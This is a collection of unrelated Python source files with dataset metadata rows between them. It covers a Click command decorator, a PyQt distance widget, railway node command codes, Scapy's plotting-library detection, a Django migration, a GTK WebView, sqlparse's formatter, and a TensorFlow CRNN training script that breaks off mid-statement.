def decorator(command_cls: Type[KiwiCommand]) -> Callable:
@click.command(
help=command_cls.__doc__,
**decorator_kwargs,
)
@_pass_instance
def cmd(ctx: Instance, project_name: Optional[str] = None, project_names: Optional[Tuple[str]] = None,
service_names: Optional[Tuple[str]] = None, **kwargs) -> None:
if command_cls.type is KiwiCommandType.INSTANCE:
project_names = []
elif command_cls.type is KiwiCommandType.PROJECTS:
project_names = list(project_names)
else:
if project_name is None:
project_names = []
else:
project_names = [project_name]
if command_cls.type is KiwiCommandType.SERVICES:
service_names = list(service_names)
command_cls.run(ctx, project_names, service_names, **kwargs)
if command_cls.type is KiwiCommandType.PROJECT:
cmd = _project_arg(cmd)
elif command_cls.type is KiwiCommandType.PROJECTS:
cmd = _projects_arg(cmd)
elif command_cls.type is KiwiCommandType.SERVICES:
cmd = _services_arg_p(cmd)
cmd = _services_arg_s(cmd)
return cmd
return decorator
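# --- Hedged illustrative sketch (not part of the upstream module) ------------
# Shows how the decorator above is intended to be applied; "_ExampleCommand"
# and its behaviour are hypothetical, real commands live in their own modules.
class _ExampleCommand(KiwiCommand):
    """Echo the project names this command was invoked for."""
    type = KiwiCommandType.PROJECTS
    @classmethod
    def run(cls, instance: Instance, project_names, service_names, **kwargs) -> None:
        click.echo(f"projects: {project_names!r}")
# Applying the decorator turns the class into a ready-to-register click command.
_example_cmd = kiwi_command()(_ExampleCommand)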
| 24.416667
| 110
| 0.612384
|
55959675db0e9ab6b53e6e9266e0ae547aa52c22
| 701
|
py
|
Python
|
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
view/distanceinfobox.py
|
siralmat/2018-trek-assignment
|
522186e1dfceb0253ad18d8cf82b5c9ddc0ee7bb
|
[
"MIT"
] | null | null | null |
"""
Module: distanceinfobox
Author: siralmat
"""
from PyQt5 import QtWidgets as Qw
from view.ui_distanceinfobox import Ui_DistanceInfoBox
class DistanceInfoBox(Qw.QWidget):
"""Small widget to display information about a distance."""
def __init__(self, parent):
"""Set up layout."""
super().__init__()
self._parent = parent
self._ui = Ui_DistanceInfoBox()
self._ui.setupUi(self)
def update(self, distance):
"""Update distance values."""
self._ui.horizontal.setText(format(distance.horizontal, ".2f"))
self._ui.ascent.setText(format(distance.ascent, ".2f"))
self._ui.descent.setText(format(distance.descent, ".2f"))
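# --- Hedged usage sketch (not part of the original module) -------------------
# Drives the widget in isolation; the "Distance" namedtuple stands in for the
# model object the real application passes, with field names taken from the
# attribute accesses above.
if __name__ == "__main__":
    import sys
    from collections import namedtuple
    Distance = namedtuple("Distance", "horizontal ascent descent")
    app = Qw.QApplication(sys.argv)
    box = DistanceInfoBox(parent=None)
    box.update(Distance(horizontal=12.34, ascent=1.5, descent=0.75))
    box.show()
    sys.exit(app.exec_())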
| 30.478261
| 71
| 0.669044
|
49df766becac117cc7713fbc7f92a7c9c0aa124a
| 1,258
|
py
|
Python
|
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
host/nodeserver/src/nodetypes.py
|
jbernardis/mycmri
|
8b84d7483ec42c31dc0da57a46f6d4d264a43836
|
[
"MIT"
] | null | null | null |
OUTPUT_ON = b'1'
OUTPUT_OFF = b'0'
OUTPUT_PULSE = b'P'
OUTPUT_CURRENT = b'O'
INPUT_DELTA = b'D'
INPUT_CURRENT = b'C'
TURNOUT_NORMAL = b'N'
TURNOUT_REVERSE = b'R'
IDENTIFY = b'Y'
SERVO_ANGLE = b'A'
SET_TURNOUT = b'T'
GET_TURNOUT = b'G'
CONFIG = b'F'
ACKNOWLEDGE = b'!'
STORE = b'W'
ERRORRESPONSE = b'E'
WARNINGRESPONSE = b'e'
def commandName(cmd):
if cmd == OUTPUT_ON:
return("OUTPUT_ON")
elif cmd == OUTPUT_OFF:
return("OUTPUT_OFF")
elif cmd == OUTPUT_PULSE:
return("OUTPUT_PULSE")
elif cmd == OUTPUT_CURRENT:
return("OUTPUT_CURRENT")
elif cmd == INPUT_DELTA:
return("INPUT_DELTA")
elif cmd == INPUT_CURRENT:
return("INPUT_CURRENT")
elif cmd == TURNOUT_NORMAL:
return("TURNOUT_NORMAL")
elif cmd == TURNOUT_REVERSE:
return("TURNOUT_REVERSE")
elif cmd == SERVO_ANGLE:
return("SERVO_ANGLE")
elif cmd == SET_TURNOUT:
return("SET_TURNOUT")
elif cmd == GET_TURNOUT:
return("GET_TURNOUT")
elif cmd == IDENTIFY:
return("IDENTIFY")
elif cmd == CONFIG:
return("CONFIG")
elif cmd == ACKNOWLEDGE:
return("ACKNOWLEDGE")
elif cmd == STORE:
return("STORE")
elif cmd == ERRORRESPONSE:
return("ERRORRESPONSE")
elif cmd == WARNINGRESPONSE:
return("WARNINGRESPONSE")
else:
return("UNKNOWN COMMAND: %s" % str(cmd))
| 20.966667
| 42
| 0.689189
|
7d8dd6aaeeeb357d01d33ca9b2e3f07540c96bb5
| 1,861
|
py
|
Python
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 149
|
2020-10-23T23:31:51.000Z
|
2022-03-15T00:25:35.000Z
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 1
|
2021-04-12T19:24:00.000Z
|
2021-04-27T03:11:07.000Z
|
03_SweynTooth/libs/scapy/extlib.py
|
Charmve/BLE-Security-Att-Def
|
3652d84bf4ac0c694bb3c4c0f611098da9122af0
|
[
"BSD-2-Clause"
] | 22
|
2020-11-17T02:52:40.000Z
|
2022-03-15T00:26:38.000Z
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
External link to programs
"""
import os
import subprocess
from scapy.error import log_loading
# Notice: this file must not be called before main.py, if started
# in interactive mode, because it needs to be called after the
# logger has been setup, to be able to print the warning messages
# MATPLOTLIB
try:
from matplotlib import get_backend as matplotlib_get_backend
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
MATPLOTLIB = 1
if "inline" in matplotlib_get_backend():
MATPLOTLIB_INLINED = 1
else:
MATPLOTLIB_INLINED = 0
MATPLOTLIB_DEFAULT_PLOT_KARGS = {"marker": "+"}
# RuntimeError to catch gtk "Cannot open display" error
except (ImportError, RuntimeError):
plt = None
Line2D = None
MATPLOTLIB = 0
MATPLOTLIB_INLINED = 0
MATPLOTLIB_DEFAULT_PLOT_KARGS = dict()
log_loading.info("Can't import matplotlib. Won't be able to plot.")
# PYX
def _test_pyx():
"""Returns if PyX is correctly installed or not"""
try:
with open(os.devnull, 'wb') as devnull:
r = subprocess.check_call(["pdflatex", "--version"],
stdout=devnull, stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
return False
else:
return r == 0
try:
import pyx # noqa: F401
if _test_pyx():
PYX = 1
else:
log_loading.info("PyX dependencies are not installed ! Please install TexLive or MikTeX.") # noqa: E501
PYX = 0
except ImportError:
log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") # noqa: E501
PYX = 0
| 29.078125
| 112
| 0.675981
|
6a1203ccf0cc099c355da1cafb7f88311692c9fd
| 577
|
py
|
Python
|
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | 1
|
2018-05-11T11:25:13.000Z
|
2018-05-11T11:25:13.000Z
|
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | null | null | null |
insta/migrations/0004_auto_20180515_1050.py
|
muturi254/instagram
|
8b8196ce0a1b5cefbe24d63202086479f0f06b27
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-05-15 10:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('insta', '0003_auto_20180515_1043'),
]
operations = [
migrations.AlterField(
model_name='image',
name='image_owner',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 25.086957
| 110
| 0.670711
|
e67431fca83cf2d85c3a01ff732f78a60fa4b7e8
| 1,926
|
py
|
Python
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 2
|
2019-02-19T17:19:24.000Z
|
2020-04-13T21:22:24.000Z
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 2
|
2019-10-26T20:54:06.000Z
|
2019-10-26T21:43:43.000Z
|
src/gtk/toga_gtk/widgets/webview.py
|
d3r3kk/toga
|
2d8c0eb30371c4ef4f0610251233569e9c618e93
|
[
"BSD-3-Clause"
] | 4
|
2019-02-13T17:54:15.000Z
|
2019-10-26T21:16:27.000Z
|
import gi
from gi.repository import Gtk
# The following import will fail if WebKit or its API wrappers aren't
# installed; handle failure gracefully
# (see https://github.com/pybee/toga/issues/26)
# Accept API version 3.0 or later
WebKit2 = None
for version in ['4.0', '3.0']:
try:
gi.require_version('WebKit2', version)
from gi.repository import WebKit2
break
except (ImportError, ValueError):
pass
from .base import Widget
class WebView(Widget):
""" GTK WebView implementation.
TODO: WebView is not displaying anything when setting a url.
"""
def create(self):
if WebKit2 is None:
raise RuntimeError(
"Import 'from gi.repository import WebKit' failed;" +
" may need to install gir1.2-webkit2-4.0 or gir1.2-webkit2-3.0.")
self.native = Gtk.ScrolledWindow()
self.native.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
self.native.interface = self.interface
self.webview = WebKit2.WebView()
self.native.add(self.webview)
self.native.set_min_content_width(200)
self.native.set_min_content_height(200)
# self.native.connect('show', lambda event: self.rehint())
def set_url(self, value):
if value:
self.webview.load_uri(value)
def set_user_agent(self, value):
        self.interface.factory.not_implemented('WebView.set_user_agent()')
# self.native.user_agent = value if value else "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
def set_content(self, root_url, content):
self.webview.load_html(content, root_url)
def get_dom(self):
self.interface.factory.not_implemented('WebView.get_dom()')
def evaluate(self, javascript):
return self.webview.run_javascript(javascript, None, None, None)
| 31.57377
| 162
| 0.669782
|
f890932fe5c436f898b9c2d5be81c458df61f84c
| 6,535
|
py
|
Python
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 1
|
2017-06-26T01:39:21.000Z
|
2017-06-26T01:39:21.000Z
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 2
|
2016-05-25T01:09:04.000Z
|
2016-05-30T18:06:17.000Z
|
sqlparse/formatter.py
|
vmuriart/sqlparse
|
0c1c96e237269ba6b964a766c4fc2fc503af5d9c
|
[
"BSD-3-Clause"
] | 1
|
2020-04-27T10:41:31.000Z
|
2020-04-27T10:41:31.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Andi Albrecht, albrecht.andi@gmail.com
#
# This module is part of python-sqlparse and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
"""SQL formatter"""
from sqlparse import filters
from sqlparse.exceptions import SQLParseError
def validate_options(options):
"""Validates options."""
kwcase = options.get('keyword_case')
if kwcase not in [None, 'upper', 'lower', 'capitalize']:
raise SQLParseError('Invalid value for keyword_case: '
'{0!r}'.format(kwcase))
idcase = options.get('identifier_case')
if idcase not in [None, 'upper', 'lower', 'capitalize']:
raise SQLParseError('Invalid value for identifier_case: '
'{0!r}'.format(idcase))
ofrmt = options.get('output_format')
if ofrmt not in [None, 'sql', 'python', 'php']:
raise SQLParseError('Unknown output format: '
'{0!r}'.format(ofrmt))
strip_comments = options.get('strip_comments', False)
if strip_comments not in [True, False]:
raise SQLParseError('Invalid value for strip_comments: '
'{0!r}'.format(strip_comments))
space_around_operators = options.get('use_space_around_operators', False)
if space_around_operators not in [True, False]:
raise SQLParseError('Invalid value for use_space_around_operators: '
'{0!r}'.format(space_around_operators))
strip_ws = options.get('strip_whitespace', False)
if strip_ws not in [True, False]:
raise SQLParseError('Invalid value for strip_whitespace: '
'{0!r}'.format(strip_ws))
truncate_strings = options.get('truncate_strings')
if truncate_strings is not None:
try:
truncate_strings = int(truncate_strings)
except (ValueError, TypeError):
raise SQLParseError('Invalid value for truncate_strings: '
'{0!r}'.format(truncate_strings))
if truncate_strings <= 1:
raise SQLParseError('Invalid value for truncate_strings: '
'{0!r}'.format(truncate_strings))
options['truncate_strings'] = truncate_strings
options['truncate_char'] = options.get('truncate_char', '[...]')
reindent = options.get('reindent', False)
if reindent not in [True, False]:
raise SQLParseError('Invalid value for reindent: '
'{0!r}'.format(reindent))
elif reindent:
options['strip_whitespace'] = True
reindent_aligned = options.get('reindent_aligned', False)
if reindent_aligned not in [True, False]:
        raise SQLParseError('Invalid value for reindent_aligned: '
                            '{0!r}'.format(reindent_aligned))
elif reindent_aligned:
options['strip_whitespace'] = True
indent_tabs = options.get('indent_tabs', False)
if indent_tabs not in [True, False]:
raise SQLParseError('Invalid value for indent_tabs: '
'{0!r}'.format(indent_tabs))
elif indent_tabs:
options['indent_char'] = '\t'
else:
options['indent_char'] = ' '
indent_width = options.get('indent_width', 2)
try:
indent_width = int(indent_width)
except (TypeError, ValueError):
raise SQLParseError('indent_width requires an integer')
if indent_width < 1:
raise SQLParseError('indent_width requires a positive integer')
options['indent_width'] = indent_width
wrap_after = options.get('wrap_after', 0)
try:
wrap_after = int(wrap_after)
except (TypeError, ValueError):
raise SQLParseError('wrap_after requires an integer')
if wrap_after < 0:
        raise SQLParseError('wrap_after requires a non-negative integer')
options['wrap_after'] = wrap_after
right_margin = options.get('right_margin')
if right_margin is not None:
try:
right_margin = int(right_margin)
except (TypeError, ValueError):
raise SQLParseError('right_margin requires an integer')
if right_margin < 10:
            raise SQLParseError('right_margin requires an integer >= 10')
options['right_margin'] = right_margin
return options
def build_filter_stack(stack, options):
"""Setup and return a filter stack.
Args:
stack: :class:`~sqlparse.filters.FilterStack` instance
options: Dictionary with options validated by validate_options.
"""
# Token filter
if options.get('keyword_case'):
stack.preprocess.append(
filters.KeywordCaseFilter(options['keyword_case']))
if options.get('identifier_case'):
stack.preprocess.append(
filters.IdentifierCaseFilter(options['identifier_case']))
if options.get('truncate_strings'):
stack.preprocess.append(filters.TruncateStringFilter(
width=options['truncate_strings'], char=options['truncate_char']))
if options.get('strip_comments'):
stack.preprocess.append(filters.StripCommentsFilter())
# After grouping
if options.get('use_space_around_operators', False):
stack.enable_grouping()
stack.stmtprocess.append(filters.SpacesAroundOperatorsFilter())
if options.get('strip_whitespace') or options.get('reindent'):
stack.enable_grouping()
stack.stmtprocess.append(filters.StripWhitespaceFilter())
if options.get('reindent'):
stack.enable_grouping()
stack.stmtprocess.append(
filters.ReindentFilter(char=options['indent_char'],
width=options['indent_width'],
wrap_after=options['wrap_after']))
if options.get('reindent_aligned', False):
stack.enable_grouping()
stack.stmtprocess.append(
filters.AlignedIndentFilter(char=options['indent_char']))
if options.get('right_margin'):
stack.enable_grouping()
stack.stmtprocess.append(
filters.RightMarginFilter(width=options['right_margin']))
# Serializer
if options.get('output_format'):
frmt = options['output_format']
if frmt.lower() == 'php':
fltr = filters.OutputPHPFilter()
elif frmt.lower() == 'python':
fltr = filters.OutputPythonFilter()
else:
fltr = None
if fltr is not None:
stack.postprocess.append(fltr)
return stack
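# --- Hedged usage sketch (not part of the original module) -------------------
# In the released library these helpers are driven by the public entry point
# sqlparse.format(); the SQL literal below is arbitrary example input.
if __name__ == "__main__":
    import sqlparse
    sql = "select id, name from users where id in (select user_id from orders)"
    print(sqlparse.format(sql, keyword_case='upper', reindent=True, indent_width=4))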
| 37.342857
| 78
| 0.633665
|
5f67cf5afe18ca0462bbc3e7dcf6d3059249d48b
| 18,587
|
py
|
Python
|
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
CRNN/train_crnn.py
|
erichan2046/Multi-Label-Text-Classification-1
|
6e36d0566240eb8e44eda69e90a04e83e199f147
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
__author__ = 'Randolph'
import os
import sys
import time
import logging
import tensorflow as tf
from utils import data_helpers as dh
from text_crnn import TextCRNN
from tensorboard.plugins import projector
# Parameters
# ==================================================
TRAIN_OR_RESTORE = input("☛ Train or Restore?(T/R) \n")
while not (TRAIN_OR_RESTORE.isalpha() and TRAIN_OR_RESTORE.upper() in ['T', 'R']):
TRAIN_OR_RESTORE = input('✘ The format of your input is illegal, please re-input: ')
logging.info('✔︎ The format of your input is legal, now loading to next step...')
TRAIN_OR_RESTORE = TRAIN_OR_RESTORE.upper()
if TRAIN_OR_RESTORE == 'T':
logger = dh.logger_fn('tflog', 'logs/training-{0}.log'.format(time.asctime()))
if TRAIN_OR_RESTORE == 'R':
logger = dh.logger_fn('tflog', 'logs/restore-{0}.log'.format(time.asctime()))
TRAININGSET_DIR = '../data/Train.json'
VALIDATIONSET_DIR = '../data/Validation.json'
METADATA_DIR = '../data/metadata.tsv'
# Data Parameters
tf.flags.DEFINE_string("training_data_file", TRAININGSET_DIR, "Data source for the training data.")
tf.flags.DEFINE_string("validation_data_file", VALIDATIONSET_DIR, "Data source for the validation data.")
tf.flags.DEFINE_string("metadata_file", METADATA_DIR, "Metadata file for embedding visualization"
"(Each line is a word segment in metadata_file).")
tf.flags.DEFINE_string("train_or_restore", TRAIN_OR_RESTORE, "Train or Restore.")
# Model Hyperparameters
tf.flags.DEFINE_float("learning_rate", 0.001, "The learning rate (default: 0.001)")
tf.flags.DEFINE_integer("pad_seq_len", 100, "Recommended padding Sequence length of data (depends on the data)")
tf.flags.DEFINE_integer("embedding_dim", 100, "Dimensionality of character embedding (default: 128)")
tf.flags.DEFINE_integer("embedding_type", 1, "The embedding type (default: 1)")
tf.flags.DEFINE_integer("lstm_hidden_size", 256, "Hidden size for bi-lstm layer(default: 256)")
tf.flags.DEFINE_integer("fc_hidden_size", 1024, "Hidden size for fully connected layer (default: 1024)")
tf.flags.DEFINE_string("filter_sizes", "3,4,5", "Comma-separated filter sizes (default: '3,4,5')")
tf.flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
tf.flags.DEFINE_float("dropout_keep_prob", 0.5, "Dropout keep probability (default: 0.5)")
tf.flags.DEFINE_float("l2_reg_lambda", 0.0, "L2 regularization lambda (default: 0.0)")
tf.flags.DEFINE_integer("num_classes", 367, "Number of labels (depends on the task)")
tf.flags.DEFINE_integer("top_num", 5, "Number of top K prediction classes (default: 5)")
tf.flags.DEFINE_float("threshold", 0.5, "Threshold for prediction classes (default: 0.5)")
# Training Parameters
tf.flags.DEFINE_integer("batch_size", 1024, "Batch Size (default: 256)")
tf.flags.DEFINE_integer("num_epochs", 150, "Number of training epochs (default: 100)")
tf.flags.DEFINE_integer("evaluate_every", 5000, "Evaluate model on dev set after this many steps (default: 5000)")
tf.flags.DEFINE_float("norm_ratio", 2, "The ratio of the sum of gradients norms of trainable variable (default: 1.25)")
tf.flags.DEFINE_integer("decay_steps", 5000, "how many steps before decay learning rate. (default: 500)")
tf.flags.DEFINE_float("decay_rate", 0.95, "Rate of decay for learning rate. (default: 0.95)")
tf.flags.DEFINE_integer("checkpoint_every", 1000, "Save model after this many steps (default: 1000)")
tf.flags.DEFINE_integer("num_checkpoints", 50, "Number of checkpoints to store (default: 50)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
tf.flags.DEFINE_boolean("gpu_options_allow_growth", True, "Allow gpu options growth")
FLAGS = tf.flags.FLAGS
FLAGS(sys.argv)
dilim = '-' * 100
logger.info('\n'.join([dilim, *['{0:>50}|{1:<50}'.format(attr.upper(), FLAGS.__getattr__(attr))
for attr in sorted(FLAGS.__dict__['__wrapped'])], dilim]))
def train_crnn():
"""Training CRNN model."""
# Load sentences, labels, and training parameters
logger.info('✔︎ Loading data...')
logger.info('✔︎ Training data processing...')
train_data = dh.load_data_and_labels(FLAGS.training_data_file, FLAGS.num_classes,
FLAGS.embedding_dim, data_aug_flag=False)
logger.info('✔︎ Validation data processing...')
validation_data = dh.load_data_and_labels(FLAGS.validation_data_file, FLAGS.num_classes,
FLAGS.embedding_dim, data_aug_flag=False)
logger.info('Recommended padding Sequence length is: {0}'.format(FLAGS.pad_seq_len))
logger.info('✔︎ Training data padding...')
x_train, y_train = dh.pad_data(train_data, FLAGS.pad_seq_len)
logger.info('✔︎ Validation data padding...')
x_validation, y_validation = dh.pad_data(validation_data, FLAGS.pad_seq_len)
# Build vocabulary
VOCAB_SIZE = dh.load_vocab_size(FLAGS.embedding_dim)
pretrained_word2vec_matrix = dh.load_word2vec_matrix(VOCAB_SIZE, FLAGS.embedding_dim)
# Build a graph and crnn object
with tf.Graph().as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
session_conf.gpu_options.allow_growth = FLAGS.gpu_options_allow_growth
sess = tf.Session(config=session_conf)
with sess.as_default():
crnn = TextCRNN(
sequence_length=FLAGS.pad_seq_len,
num_classes=FLAGS.num_classes,
vocab_size=VOCAB_SIZE,
lstm_hidden_size=FLAGS.lstm_hidden_size,
fc_hidden_size=FLAGS.fc_hidden_size,
embedding_size=FLAGS.embedding_dim,
embedding_type=FLAGS.embedding_type,
filter_sizes=list(map(int, FLAGS.filter_sizes.split(","))),
num_filters=FLAGS.num_filters,
l2_reg_lambda=FLAGS.l2_reg_lambda,
pretrained_embedding=pretrained_word2vec_matrix)
# Define training procedure
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
learning_rate = tf.train.exponential_decay(learning_rate=FLAGS.learning_rate,
global_step=crnn.global_step, decay_steps=FLAGS.decay_steps,
decay_rate=FLAGS.decay_rate, staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
grads, vars = zip(*optimizer.compute_gradients(crnn.loss))
grads, _ = tf.clip_by_global_norm(grads, clip_norm=FLAGS.norm_ratio)
train_op = optimizer.apply_gradients(zip(grads, vars), global_step=crnn.global_step, name="train_op")
# Keep track of gradient values and sparsity (optional)
grad_summaries = []
for g, v in zip(grads, vars):
if g is not None:
grad_hist_summary = tf.summary.histogram("{0}/grad/hist".format(v.name), g)
sparsity_summary = tf.summary.scalar("{0}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
grad_summaries_merged = tf.summary.merge(grad_summaries)
# Output directory for models and summaries
if FLAGS.train_or_restore == 'R':
MODEL = input("☛ Please input the checkpoints model you want to restore, "
"it should be like(1490175368): ") # The model you want to restore
while not (MODEL.isdigit() and len(MODEL) == 10):
MODEL = input('✘ The format of your input is illegal, please re-input: ')
logger.info('✔︎ The format of your input is legal, now loading to next step...')
checkpoint_dir = 'runs/' + MODEL + '/checkpoints/'
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", MODEL))
logger.info("✔︎ Writing to {0}\n".format(out_dir))
else:
timestamp = str(int(time.time()))
out_dir = os.path.abspath(os.path.join(os.path.curdir, "runs", timestamp))
logger.info("✔︎ Writing to {0}\n".format(out_dir))
# Summaries for loss
loss_summary = tf.summary.scalar("loss", crnn.loss)
# Train summaries
train_summary_op = tf.summary.merge([loss_summary, grad_summaries_merged])
train_summary_dir = os.path.join(out_dir, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)
# Validation summaries
validation_summary_op = tf.summary.merge([loss_summary])
validation_summary_dir = os.path.join(out_dir, "summaries", "validation")
validation_summary_writer = tf.summary.FileWriter(validation_summary_dir, sess.graph)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.num_checkpoints)
if FLAGS.train_or_restore == 'R':
# Load crnn model
logger.info("✔ Loading model...")
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
logger.info(checkpoint_file)
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
else:
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
# Embedding visualization config
config = projector.ProjectorConfig()
embedding_conf = config.embeddings.add()
embedding_conf.tensor_name = 'embedding'
embedding_conf.metadata_path = FLAGS.metadata_file
projector.visualize_embeddings(train_summary_writer, config)
projector.visualize_embeddings(validation_summary_writer, config)
# Save the embedding visualization
saver.save(sess, os.path.join(out_dir, 'embedding', 'embedding.ckpt'))
current_step = sess.run(crnn.global_step)
def train_step(x_batch, y_batch):
"""A single training step"""
feed_dict = {
crnn.input_x: x_batch,
crnn.input_y: y_batch,
crnn.dropout_keep_prob: FLAGS.dropout_keep_prob,
crnn.is_training: True
}
_, step, summaries, loss = sess.run(
[train_op, crnn.global_step, train_summary_op, crnn.loss], feed_dict)
logger.info("step {0}: loss {1:g}".format(step, loss))
train_summary_writer.add_summary(summaries, step)
def validation_step(x_validation, y_validation, writer=None):
"""Evaluates model on a validation set"""
batches_validation = dh.batch_iter(
list(zip(x_validation, y_validation)), FLAGS.batch_size, 1)
# Predict classes by threshold or topk ('ts': threshold; 'tk': topk)
eval_counter, eval_loss, eval_rec_ts, eval_pre_ts, eval_F_ts = 0, 0.0, 0.0, 0.0, 0.0
eval_rec_tk = [0.0] * FLAGS.top_num
eval_pre_tk = [0.0] * FLAGS.top_num
eval_F_tk = [0.0] * FLAGS.top_num
for batch_validation in batches_validation:
x_batch_validation, y_batch_validation = zip(*batch_validation)
feed_dict = {
crnn.input_x: x_batch_validation,
crnn.input_y: y_batch_validation,
crnn.dropout_keep_prob: 1.0,
crnn.is_training: False
}
step, summaries, scores, cur_loss = sess.run(
[crnn.global_step, validation_summary_op, crnn.scores, crnn.loss], feed_dict)
# Predict by threshold
predicted_labels_threshold, predicted_values_threshold = \
dh.get_label_using_scores_by_threshold(scores=scores, threshold=FLAGS.threshold)
cur_rec_ts, cur_pre_ts, cur_F_ts = 0.0, 0.0, 0.0
for index, predicted_label_threshold in enumerate(predicted_labels_threshold):
rec_inc_ts, pre_inc_ts = dh.cal_metric(predicted_label_threshold, y_batch_validation[index])
cur_rec_ts, cur_pre_ts = cur_rec_ts + rec_inc_ts, cur_pre_ts + pre_inc_ts
cur_rec_ts = cur_rec_ts / len(y_batch_validation)
cur_pre_ts = cur_pre_ts / len(y_batch_validation)
cur_F_ts = dh.cal_F(cur_rec_ts, cur_pre_ts)
eval_rec_ts, eval_pre_ts = eval_rec_ts + cur_rec_ts, eval_pre_ts + cur_pre_ts
# Predict by topK
topK_predicted_labels = []
for top_num in range(FLAGS.top_num):
predicted_labels_topk, predicted_values_topk = \
dh.get_label_using_scores_by_topk(scores=scores, top_num=top_num+1)
topK_predicted_labels.append(predicted_labels_topk)
cur_rec_tk = [0.0] * FLAGS.top_num
cur_pre_tk = [0.0] * FLAGS.top_num
cur_F_tk = [0.0] * FLAGS.top_num
for top_num, predicted_labels_topK in enumerate(topK_predicted_labels):
for index, predicted_label_topK in enumerate(predicted_labels_topK):
rec_inc_tk, pre_inc_tk = dh.cal_metric(predicted_label_topK, y_batch_validation[index])
cur_rec_tk[top_num], cur_pre_tk[top_num] = \
cur_rec_tk[top_num] + rec_inc_tk, cur_pre_tk[top_num] + pre_inc_tk
cur_rec_tk[top_num] = cur_rec_tk[top_num] / len(y_batch_validation)
cur_pre_tk[top_num] = cur_pre_tk[top_num] / len(y_batch_validation)
cur_F_tk[top_num] = dh.cal_F(cur_rec_tk[top_num], cur_pre_tk[top_num])
eval_rec_tk[top_num], eval_pre_tk[top_num] = \
eval_rec_tk[top_num] + cur_rec_tk[top_num], eval_pre_tk[top_num] + cur_pre_tk[top_num]
eval_loss = eval_loss + cur_loss
eval_counter = eval_counter + 1
logger.info("✔︎ validation batch {0}: loss {1:g}".format(eval_counter, cur_loss))
logger.info("︎☛ Predict by threshold: recall {0:g}, precision {1:g}, F {2:g}"
.format(cur_rec_ts, cur_pre_ts, cur_F_ts))
logger.info("︎☛ Predict by topK:")
for top_num in range(FLAGS.top_num):
logger.info("Top{0}: recall {1:g}, precision {2:g}, F {3:g}"
